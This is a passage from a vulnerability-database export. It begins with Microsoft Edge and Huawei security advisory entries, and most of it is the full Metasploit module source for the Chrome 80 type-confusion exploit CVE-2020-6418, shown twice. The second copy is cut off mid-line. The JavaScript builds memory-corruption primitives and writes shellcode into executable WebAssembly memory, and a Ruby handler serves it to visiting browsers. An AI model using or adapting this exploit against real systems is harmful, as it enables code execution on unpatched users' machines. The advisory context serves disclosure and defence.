[CVE-2020-6407](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6407>), [**CVE-2020-6418**](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6418>) * \n80.0.361.57 | 2/20/2020 | 80.0.3987.116 | High | [CVE-2020-6383](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6383>), [CVE-2020-6384](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6384>), [CVE-2020-6386](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6386>) \n80.0.361.48 | 2/7/2020 | 80.0.3987.87 | High | [CVE-2020-6381](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6381>), [CVE-2020-6382](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6382>), [CVE-2019-18197](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18197>), [CVE-2019-19926](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19926>), [CVE-2020-6385](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6385>), [CVE-2019-19880](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19880>), [CVE-2019-19925](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19925>), [CVE-2020-6387](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6387>), [CVE-2020-6388](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6388>), [CVE-2020-6389](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6389>), [CVE-2020-6390](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6390>), [CVE-2020-6391](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6391>), [CVE-2020-6392](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-202-6392>), [CVE-2020-6393](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6393>), [CVE-2020-6394](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6394>), [CVE-2020-6395](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6395>), [CVE-2020-6396](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6396>), [CVE-2020-6397](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6397>), [CVE-2020-6398](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6398>), [CVE-2020-6399](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6399>), [CVE-2020-6400](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6400>), [CVE-2020-6401](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6401>), [CVE-2020-6402](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6402>), [CVE-2020-6404](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6404>), [CVE-2020-6405](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-220-6405>), [CVE-2020-6406](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6406>), [CVE-2019-19923](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19923>), [CVE-2020-6408](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6408>), [CVE-2020-6409](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6409>), [CVE-2020-6410](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6410>), [CVE-2020-6411](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6411>), [CVE-2020-6412](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6412>), [CVE-2020-6413](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6413>), [CVE-2020-6414](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6414>), [CVE-2020-6415](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6415>), [CVE-2020-6416](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6416>), [CVE-2020-6417](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6417>) \n79.0.309.68 | 1/17/2020 | 79.0.3945.130 | Critical | [CVE-2020-6378](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6378>), [CVE-2020-6379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6379>), [CVE-2020-6380](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6380>), [CVE-2020-0601](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0601>) \n \n* CVE\u2019s in **bold** have been reported to be exploited in the wild.\n\n**How can I see the version of the browser?**\n\n 1. In your Microsoft Edge browser, click on the 3 dots (...) on the very right-hand side of the window\n 2. Click on **Help and Feedback**\n 3. Click on **About Microsoft Edge**\n", "edition": 33, "modified": "2021-01-21T08:00:00", "id": "MS:ADV200002", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200002", "published": "2021-01-21T08:00:00", "title": "Chromium Security Updates for Microsoft Edge (Chromium-Based)", "type": "mscve", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "huawei": [{"lastseen": "2020-08-05T17:27:57", "bulletinFamily": "software", "cvelist": ["CVE-2020-1027"], "description": "Microsoft released a security advisory to disclose an elevation of privilege vulnerability which exists in the way that the Windows Kernel handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. To exploit the vulnerability, a locally authenticated attacker could run a specially crafted application. (Vulnerability ID: HWPSIRT-2020-04145)\nThis vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2020-1027.\nHuawei has released software updates to fix this vulnerability. This advisory is available at the following link:\nhttp://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200805-01-windows-en", "edition": 1, "modified": "2020-08-05T00:00:00", "published": "2020-08-05T00:00:00", "id": "HUAWEI-SA-20200805-01-WINDOWS", "href": "https://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200805-01-windows-en", "title": "Security Advisory - Elevation of Privilege Vulnerability in Some Microsoft Windows Systems", "type": "huawei", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2020-03-06T15:10:06", "description": "This Metasploit module exploits an issue in Google Chrome version 80.0.3987.87 (64 bit). The exploit corrupts the length of a float array (float_rel), which can then be used for out of bounds read and write on adjacent memory. The relative read and write is then used to modify a UInt64Array (uint64_aarw) which is used for read and writing from absolute memory. The exploit then uses WebAssembly in order to allocate a region of RWX memory, which is then replaced with the payload shellcode. The payload is executed within the sandboxed renderer process, so the browser must be run with the --no-sandbox option for the payload to work correctly.", "edition": 1, "published": "2020-03-06T00:00:00", "title": "Google Chrome 80 JSCreate Side-Effect Type Confusion Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-6418"], "modified": "2020-03-06T00:00:00", "id": "1337DAY-ID-34056", "href": "https://0day.today/exploit/description/34056", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ManualRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Exploit::Remote::HttpServer\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Google Chrome 80 JSCreate side-effect type confusion exploit',\r\n 'Description' => %q{\r\n This module exploits an issue in Google Chrome 80.0.3987.87 (64 bit). The exploit\r\n corrupts the length of a float array (float_rel), which can then be used for out\r\n of bounds read and write on adjacent memory.\r\n The relative read and write is then used to modify a UInt64Array (uint64_aarw)\r\n which is used for read and writing from absolute memory.\r\n The exploit then uses WebAssembly in order to allocate a region of RWX memory,\r\n which is then replaced with the payload shellcode.\r\n The payload is executed within the sandboxed renderer process, so the browser\r\n must be run with the --no-sandbox option for the payload to work correctly.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'Cl\u00e9ment Lecigne', # discovery\r\n 'Istv\u00e1n Kurucsai', # exploit\r\n 'Vignesh S Rao', # exploit\r\n 'timwr', # metasploit copypasta\r\n ],\r\n 'References' => [\r\n ['CVE', '2020-6418'],\r\n ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=1053604'],\r\n ['URL', 'https://blog.exodusintel.com/2020/02/24/a-eulogy-for-patch-gapping'],\r\n ['URL', 'https://ray-cp.github.io/archivers/browser-pwn-cve-2020-6418%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90'],\r\n ],\r\n 'Arch' => [ ARCH_X64 ],\r\n 'DefaultTarget' => 0,\r\n 'Targets' =>\r\n [\r\n ['Windows 10 - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'win'}],\r\n ['macOS - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'osx'}],\r\n ],\r\n 'DisclosureDate' => 'Feb 19 2020'))\r\n register_advanced_options([\r\n OptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information during exploitation\", false]),\r\n ])\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n if datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*}\r\n print_status(\"[*] #{request.body}\")\r\n send_response(cli, '')\r\n return\r\n end\r\n\r\n print_status(\"Sending #{request.uri} to #{request['User-Agent']}\")\r\n escaped_payload = Rex::Text.to_unescape(payload.raw)\r\n jscript = %Q^\r\nvar shellcode = unescape(\"#{escaped_payload}\");\r\n\r\n// HELPER FUNCTIONS\r\nlet conversion_buffer = new ArrayBuffer(8);\r\nlet float_view = new Float64Array(conversion_buffer);\r\nlet int_view = new BigUint64Array(conversion_buffer);\r\nBigInt.prototype.hex = function() {\r\n return '0x' + this.toString(16);\r\n};\r\nBigInt.prototype.i2f = function() {\r\n int_view[0] = this;\r\n return float_view[0];\r\n}\r\nBigInt.prototype.smi2f = function() {\r\n int_view[0] = this << 32n;\r\n return float_view[0];\r\n}\r\nNumber.prototype.f2i = function() {\r\n float_view[0] = this;\r\n return int_view[0];\r\n}\r\nNumber.prototype.f2smi = function() {\r\n float_view[0] = this;\r\n return int_view[0] >> 32n;\r\n}\r\n\r\nNumber.prototype.fhw = function() {\r\n float_view[0] = this;\r\n return int_view[0] >> 32n;\r\n}\r\n\r\nNumber.prototype.flw = function() {\r\n float_view[0] = this;\r\n return int_view[0] & BigInt(2**32-1);\r\n}\r\n\r\nNumber.prototype.i2f = function() {\r\n return BigInt(this).i2f();\r\n}\r\nNumber.prototype.smi2f = function() {\r\n return BigInt(this).smi2f();\r\n}\r\n\r\nfunction hex(a) {\r\n return a.toString(16);\r\n}\r\n\r\n//\r\n// EXPLOIT\r\n//\r\n\r\n// the number of holes here determines the OOB write offset\r\nlet vuln = [0.1, ,,,,,,,,,,,,,,,,,,,,,, 6.1, 7.1, 8.1];\r\nvar float_rel; // float array, initially corruption target\r\nvar float_carw; // float array, used for reads/writes within the compressed heap\r\nvar uint64_aarw; // uint64 typed array, used for absolute reads/writes in the entire address space\r\nvar obj_leaker; // used to implement addrof\r\nvuln.pop();\r\nvuln.pop();\r\nvuln.pop();\r\n\r\nfunction empty() {}\r\n\r\nfunction f(nt) {\r\n // The compare operation enforces an effect edge between JSCreate and Array.push, thus introducing the bug\r\n vuln.push(typeof(Reflect.construct(empty, arguments, nt)) === Proxy ? 0.2 : 156842065920.05);\r\n for (var i = 0; i < 0x10000; ++i) {};\r\n}\r\n\r\nlet p = new Proxy(Object, {\r\n get: function() {\r\n vuln[0] = {};\r\n float_rel = [0.2, 1.2, 2.2, 3.2, 4.3];\r\n float_carw = [6.6];\r\n uint64_aarw = new BigUint64Array(4);\r\n obj_leaker = {\r\n a: float_rel,\r\n b: float_rel,\r\n };\r\n\r\n return Object.prototype;\r\n }\r\n});\r\n\r\nfunction main(o) {\r\n for (var i = 0; i < 0x10000; ++i) {};\r\n return f(o);\r\n}\r\n\r\n// reads 4 bytes from the compressed heap at the specified dword offset after float_rel\r\nfunction crel_read4(offset) {\r\n var qw_offset = Math.floor(offset / 2);\r\n if (offset & 1 == 1) {\r\n return float_rel[qw_offset].fhw();\r\n } else {\r\n return float_rel[qw_offset].flw();\r\n }\r\n}\r\n\r\n// writes the specified 4-byte BigInt value to the compressed heap at the specified offset after float_rel\r\nfunction crel_write4(offset, val) {\r\n var qw_offset = Math.floor(offset / 2);\r\n // we are writing an 8-byte double under the hood\r\n // read out the other half and keep its value\r\n if (offset & 1 == 1) {\r\n temp = float_rel[qw_offset].flw();\r\n new_val = (val << 32n | temp).i2f();\r\n float_rel[qw_offset] = new_val;\r\n } else {\r\n temp = float_rel[qw_offset].fhw();\r\n new_val = (temp << 32n | val).i2f();\r\n float_rel[qw_offset] = new_val;\r\n }\r\n}\r\n\r\nconst float_carw_elements_offset = 0x14;\r\n\r\nfunction cabs_read4(caddr) {\r\n elements_addr = caddr - 8n | 1n;\r\n crel_write4(float_carw_elements_offset, elements_addr);\r\n print('cabs_read4: ' + hex(float_carw[0].f2i()));\r\n res = float_carw[0].flw();\r\n // TODO restore elements ptr\r\n return res;\r\n}\r\n\r\n\r\n// This function provides arbitrary within read the compressed heap\r\nfunction cabs_read8(caddr) {\r\n elements_addr = caddr - 8n | 1n;\r\n crel_write4(float_carw_elements_offset, elements_addr);\r\n print('cabs_read8: ' + hex(float_carw[0].f2i()));\r\n res = float_carw[0].f2i();\r\n // TODO restore elements ptr\r\n return res;\r\n}\r\n\r\n// This function provides arbitrary write within the compressed heap\r\nfunction cabs_write4(caddr, val) {\r\n elements_addr = caddr - 8n | 1n;\r\n\r\n temp = cabs_read4(caddr + 4n | 1n);\r\n print('cabs_write4 temp: '+ hex(temp));\r\n\r\n new_val = (temp << 32n | val).i2f();\r\n\r\n crel_write4(float_carw_elements_offset, elements_addr);\r\n print('cabs_write4 prev_val: '+ hex(float_carw[0].f2i()));\r\n\r\n float_carw[0] = new_val;\r\n // TODO restore elements ptr\r\n return res;\r\n}\r\n\r\nconst objleaker_offset = 0x41;\r\nfunction addrof(o) {\r\n obj_leaker.b = o;\r\n addr = crel_read4(objleaker_offset) & BigInt(2**32-2);\r\n obj_leaker.b = {};\r\n return addr;\r\n}\r\n\r\nconst uint64_externalptr_offset = 0x1b; // in 8-bytes\r\n\r\n// Arbitrary read. We corrupt the backing store of the `uint64_aarw` array and then read from the array\r\nfunction read8(addr) {\r\n faddr = addr.i2f();\r\n t1 = float_rel[uint64_externalptr_offset];\r\n t2 = float_rel[uint64_externalptr_offset + 1];\r\n float_rel[uint64_externalptr_offset] = faddr;\r\n float_rel[uint64_externalptr_offset + 1] = 0.0;\r\n\r\n val = uint64_aarw[0];\r\n\r\n float_rel[uint64_externalptr_offset] = t1;\r\n float_rel[uint64_externalptr_offset + 1] = t2;\r\n return val;\r\n}\r\n\r\n// Arbitrary write. We corrupt the backing store of the `uint64_aarw` array and then write into the array\r\nfunction write8(addr, val) {\r\n faddr = addr.i2f();\r\n t1 = float_rel[uint64_externalptr_offset];\r\n t2 = float_rel[uint64_externalptr_offset + 1];\r\n float_rel[uint64_externalptr_offset] = faddr;\r\n float_rel[uint64_externalptr_offset + 1] = 0.0;\r\n\r\n uint64_aarw[0] = val;\r\n\r\n float_rel[uint64_externalptr_offset] = t1;\r\n float_rel[uint64_externalptr_offset + 1] = t2;\r\n return val;\r\n}\r\n\r\n// Given an array of bigints, this will write all the elements to the address provided as argument\r\nfunction writeShellcode(addr, sc) {\r\n faddr = addr.i2f();\r\n t1 = float_rel[uint64_externalptr_offset];\r\n t2 = float_rel[uint64_externalptr_offset + 1];\r\n float_rel[uint64_externalptr_offset - 1] = 10;\r\n float_rel[uint64_externalptr_offset] = faddr;\r\n float_rel[uint64_externalptr_offset + 1] = 0.0;\r\n\r\n for (var i = 0; i < sc.length; ++i) {\r\n uint64_aarw[i] = sc[i]\r\n }\r\n\r\n float_rel[uint64_externalptr_offset] = t1;\r\n float_rel[uint64_externalptr_offset + 1] = t2;\r\n}\r\n\r\n\r\nfunction get_compressed_rw() {\r\n\r\n for (var i = 0; i < 0x10000; ++i) {empty();}\r\n\r\n main(empty);\r\n main(empty);\r\n\r\n // Function would be jit compiled now.\r\n main(p);\r\n\r\n print(`Corrupted length of float_rel array = ${float_rel.length}`);\r\n}\r\n\r\nfunction get_arw() {\r\n get_compressed_rw();\r\n print('should be 0x2: ' + hex(crel_read4(0x15)));\r\n let previous_elements = crel_read4(0x14);\r\n //print(hex(previous_elements));\r\n //print(hex(cabs_read4(previous_elements)));\r\n //print(hex(cabs_read4(previous_elements + 4n)));\r\n cabs_write4(previous_elements, 0x66554433n);\r\n //print(hex(cabs_read4(previous_elements)));\r\n //print(hex(cabs_read4(previous_elements + 4n)));\r\n\r\n print('addrof(float_rel): ' + hex(addrof(float_rel)));\r\n uint64_aarw[0] = 0x4142434445464748n;\r\n}\r\n\r\nfunction rce() {\r\n function get_wasm_func() {\r\n var importObject = {\r\n imports: { imported_func: arg => print(arg) }\r\n };\r\n bc = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb];\r\n wasm_code = new Uint8Array(bc);\r\n wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), importObject);\r\n return wasm_mod.exports.exported_func;\r\n }\r\n\r\n let wasm_func = get_wasm_func();\r\n // traverse the JSFunction object chain to find the RWX WebAssembly code page\r\n let wasm_func_addr = addrof(wasm_func);\r\n let sfi = cabs_read4(wasm_func_addr + 12n) - 1n;\r\n print('sfi: ' + hex(sfi));\r\n let WasmExportedFunctionData = cabs_read4(sfi + 4n) - 1n;\r\n print('WasmExportedFunctionData: ' + hex(WasmExportedFunctionData));\r\n\r\n let instance = cabs_read4(WasmExportedFunctionData + 8n) - 1n;\r\n print('instance: ' + hex(instance));\r\n\r\n let wasm_rwx_addr = cabs_read8(instance + 0x68n);\r\n print('wasm_rwx_addr: ' + hex(wasm_rwx_addr));\r\n\r\n // write the shellcode to the RWX page\r\n while(shellcode.length % 4 != 0){\r\n shellcode += \"\\u9090\";\r\n }\r\n\r\n let sc = [];\r\n\r\n // convert the shellcode to BigInt\r\n for (let i = 0; i < shellcode.length; i += 4) {\r\n sc.push(BigInt(shellcode.charCodeAt(i)) + BigInt(shellcode.charCodeAt(i + 1) * 0x10000) + BigInt(shellcode.charCodeAt(i + 2) * 0x100000000) + BigInt(shellcode.charCodeAt(i + 3) * 0x1000000000000));\r\n }\r\n\r\n writeShellcode(wasm_rwx_addr,sc);\r\n\r\n print('success');\r\n wasm_func();\r\n}\r\n\r\n\r\nfunction exp() {\r\n get_arw();\r\n rce();\r\n}\r\n\r\nexp();\r\n^\r\n\r\n if datastore['DEBUG_EXPLOIT']\r\n debugjs = %Q^\r\nprint = function(arg) {\r\n var request = new XMLHttpRequest();\r\n request.open(\"POST\", \"/print\", false);\r\n request.send(\"\" + arg);\r\n};\r\n^\r\n jscript = \"#{debugjs}#{jscript}\"\r\n else\r\n jscript.gsub!(/\\/\\/.*$/, '') # strip comments\r\n jscript.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') # strip print(*);\r\n end\r\n\r\n html = %Q^\r\n<html>\r\n<head>\r\n<script>\r\n#{jscript}\r\n</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n ^\r\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})\r\n end\r\n\r\nend\n\n# 0day.today [2020-03-06] #", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "sourceHref": "https://0day.today/exploit/34056"}], "packetstorm": [{"lastseen": "2020-03-05T22:51:46", "description": "", "published": "2020-03-05T00:00:00", "type": "packetstorm", "title": "Google Chrome 80 JSCreate Side-Effect Type Confusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-6418"], "modified": "2020-03-05T00:00:00", "id": "PACKETSTORM:156632", "href": "https://packetstormsecurity.com/files/156632/Google-Chrome-80-JSCreate-Side-Effect-Type-Confusion.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ManualRanking \n \ninclude Msf::Post::File \ninclude Msf::Exploit::Remote::HttpServer \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Google Chrome 80 JSCreate side-effect type confusion exploit', \n'Description' => %q{ \nThis module exploits an issue in Google Chrome 80.0.3987.87 (64 bit). The exploit \ncorrupts the length of a float array (float_rel), which can then be used for out \nof bounds read and write on adjacent memory. \nThe relative read and write is then used to modify a UInt64Array (uint64_aarw) \nwhich is used for read and writing from absolute memory. \nThe exploit then uses WebAssembly in order to allocate a region of RWX memory, \nwhich is then replaced with the payload shellcode. \nThe payload is executed within the sandboxed renderer process, so the browser \nmust be run with the --no-sandbox option for the payload to work correctly. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Cl\u00e9ment Lecigne', # discovery \n'Istv\u00e1n Kurucsai', # exploit \n'Vignesh S Rao', # exploit \n'timwr', # metasploit copypasta \n], \n'References' => [ \n['CVE', '2020-6418'], \n['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=1053604'], \n['URL', 'https://blog.exodusintel.com/2020/02/24/a-eulogy-for-patch-gapping'], \n['URL', 'https://ray-cp.github.io/archivers/browser-pwn-cve-2020-6418%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90'], \n], \n'Arch' => [ ARCH_X64 ], \n'DefaultTarget' => 0, \n'Targets' => \n[ \n['Windows 10 - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'win'}], \n['macOS - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'osx'}], \n], \n'DisclosureDate' => 'Feb 19 2020')) \nregister_advanced_options([ \nOptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information during exploitation\", false]), \n]) \nend \n \ndef on_request_uri(cli, request) \nif datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*} \nprint_status(\"[*] #{request.body}\") \nsend_response(cli, '') \nreturn \nend \n \nprint_status(\"Sending #{request.uri} to #{request['User-Agent']}\") \nescaped_payload = Rex::Text.to_unescape(payload.raw) \njscript = %Q^ \nvar shellcode = unescape(\"#{escaped_payload}\"); \n \n// HELPER FUNCTIONS \nlet conversion_buffer = new ArrayBuffer(8); \nlet float_view = new Float64Array(conversion_buffer); \nlet int_view = new BigUint64Array(conversion_buffer); \nBigInt.prototype.hex = function() { \nreturn '0x' + this.toString(16); \n}; \nBigInt.prototype.i2f = function() { \nint_view[0] = this; \nreturn float_view[0]; \n} \nBigInt.prototype.smi2f = function() { \nint_view[0] = this << 32n; \nreturn float_view[0]; \n} \nNumber.prototype.f2i = function() { \nfloat_view[0] = this; \nreturn int_view[0]; \n} \nNumber.prototype.f2smi = function() { \nfloat_view[0] = this; \nreturn int_view[0] >> 32n; \n} \n \nNumber.prototype.fhw = function() { \nfloat_view[0] = this; \nreturn int_view[0] >> 32n; \n} \n \nNumber.prototype.flw = function() { \nfloat_view[0] = this; \nreturn int_view[0] & BigInt(2**32-1); \n} \n \nNumber.prototype.i2f = function() { \nreturn BigInt(this).i2f(); \n} \nNumber.prototype.smi2f = function() { \nreturn BigInt(this).smi2f(); \n} \n \nfunction hex(a) { \nreturn a.toString(16); \n} \n \n// \n// EXPLOIT \n// \n \n// the number of holes here determines the OOB write offset \nlet vuln = [0.1, ,,,,,,,,,,,,,,,,,,,,,, 6.1, 7.1, 8.1]; \nvar float_rel; // float array, initially corruption target \nvar float_carw; // float array, used for reads/writes within the compressed heap \nvar uint64_aarw; // uint64 typed array, used for absolute reads/writes in the entire address space \nvar obj_leaker; // used to implement addrof \nvuln.pop(); \nvuln.pop(); \nvuln.pop(); \n \nfunction empty() {} \n \nfunction f(nt) { \n// The compare operation enforces an effect edge between JSCreate and Array.push, thus introducing the bug \nvuln.push(typeof(Reflect.construct(empty, arguments, nt)) === Proxy ? 0.2 : 156842065920.05); \nfor (var i = 0; i < 0x10000; ++i) {}; \n} \n \nlet p = new Proxy(Object, { \nget: function() { \nvuln[0] = {}; \nfloat_rel = [0.2, 1.2, 2.2, 3.2, 4.3]; \nfloat_carw = [6.6]; \nuint64_aarw = new BigUint64Array(4); \nobj_leaker = { \na: float_rel, \nb: float_rel, \n}; \n \nreturn Object.prototype; \n} \n}); \n \nfunction main(o) { \nfor (var i = 0; i < 0x10000; ++i) {}; \nreturn f(o); \n} \n \n// reads 4 bytes from the compressed heap at the specified dword offset after float_rel \nfunction crel_read4(offset) { \nvar qw_offset = Math.floor(offset / 2); \nif (offset & 1 == 1) { \nreturn float_rel[qw_offset].fhw(); \n} else { \nreturn float_rel[qw_offset].flw(); \n} \n} \n \n// writes the specified 4-byte BigInt value to the compressed heap at the specified offset after float_rel \nfunction crel_write4(offset, val) { \nvar qw_offset = Math.floor(offset / 2); \n// we are writing an 8-byte double under the hood \n// read out the other half and keep its value \nif (offset & 1 == 1) { \ntemp = float_rel[qw_offset].flw(); \nnew_val = (val << 32n | temp).i2f(); \nfloat_rel[qw_offset] = new_val; \n} else { \ntemp = float_rel[qw_offset].fhw(); \nnew_val = (temp << 32n | val).i2f(); \nfloat_rel[qw_offset] = new_val; \n} \n} \n \nconst float_carw_elements_offset = 0x14; \n \nfunction cabs_read4(caddr) { \nelements_addr = caddr - 8n | 1n; \ncrel_write4(float_carw_elements_offset, elements_addr); \nprint('cabs_read4: ' + hex(float_carw[0].f2i())); \nres = float_carw[0].flw(); \n// TODO restore elements ptr \nreturn res; \n} \n \n \n// This function provides arbitrary within read the compressed heap \nfunction cabs_read8(caddr) { \nelements_addr = caddr - 8n | 1n; \ncrel_write4(float_carw_elements_offset, elements_addr); \nprint('cabs_read8: ' + hex(float_carw[0].f2i())); \nres = float_carw[0].f2i(); \n// TODO restore elements ptr \nreturn res; \n} \n \n// This function provides arbitrary write within the compressed heap \nfunction cabs_write4(caddr, val) { \nelements_addr = caddr - 8n | 1n; \n \ntemp = cabs_read4(caddr + 4n | 1n); \nprint('cabs_write4 temp: '+ hex(temp)); \n \nnew_val = (temp << 32n | val).i2f(); \n \ncrel_write4(float_carw_elements_offset, elements_addr); \nprint('cabs_write4 prev_val: '+ hex(float_carw[0].f2i())); \n \nfloat_carw[0] = new_val; \n// TODO restore elements ptr \nreturn res; \n} \n \nconst objleaker_offset = 0x41; \nfunction addrof(o) { \nobj_leaker.b = o; \naddr = crel_read4(objleaker_offset) & BigInt(2**32-2); \nobj_leaker.b = {}; \nreturn addr; \n} \n \nconst uint64_externalptr_offset = 0x1b; // in 8-bytes \n \n// Arbitrary read. We corrupt the backing store of the `uint64_aarw` array and then read from the array \nfunction read8(addr) { \nfaddr = addr.i2f(); \nt1 = float_rel[uint64_externalptr_offset]; \nt2 = float_rel[uint64_externalptr_offset + 1]; \nfloat_rel[uint64_externalptr_offset] = faddr; \nfloat_rel[uint64_externalptr_offset + 1] = 0.0; \n \nval = uint64_aarw[0]; \n \nfloat_rel[uint64_externalptr_offset] = t1; \nfloat_rel[uint64_externalptr_offset + 1] = t2; \nreturn val; \n} \n \n// Arbitrary write. We corrupt the backing store of the `uint64_aarw` array and then write into the array \nfunction write8(addr, val) { \nfaddr = addr.i2f(); \nt1 = float_rel[uint64_externalptr_offset]; \nt2 = float_rel[uint64_externalptr_offset + 1]; \nfloat_rel[uint64_externalptr_offset] = faddr; \nfloat_rel[uint64_externalptr_offset + 1] = 0.0; \n \nuint64_aarw[0] = val; \n \nfloat_rel[uint64_externalptr_offset] = t1; \nfloat_rel[uint64_externalptr_offset + 1] = t2; \nreturn val; \n} \n \n// Given an array of bigints, this will write all the elements to the address provided as argument \nfunction writeShellcode(addr, sc) { \nfaddr = addr.i2f(); \nt1 = float_rel[uint64_externalptr_offset]; \nt2 = float_rel[uint64_externalptr_offset + 1]; \nfloat_rel[uint64_externalptr_offset - 1] = 10; \nfloat_rel[uint64_externalptr_offset] = faddr; \nfloat_rel[uint64_externalptr_offset + 1] = 0.0; \n \nfor (var i = 0; i < sc.length; ++i) { \nuint64_aarw[i] = sc[i] \n} \n \nfloat_rel[uint64_externalptr_offset] = t1; \nfloat_rel[uint64_externalptr_offset + 1] = t2; \n} \n \n \nfunction get_compressed_rw() { \n \nfor (var i = 0; i < 0x10000; ++i) {empty();} \n \nmain(empty); \nmain(empty); \n \n// Function would be jit compiled now. \nmain(p); \n \nprint(`Corrupted length of float_rel array = ${float_rel.length}`); \n} \n \nfunction get_arw() { \nget_compressed_rw(); \nprint('should be 0x2: ' + 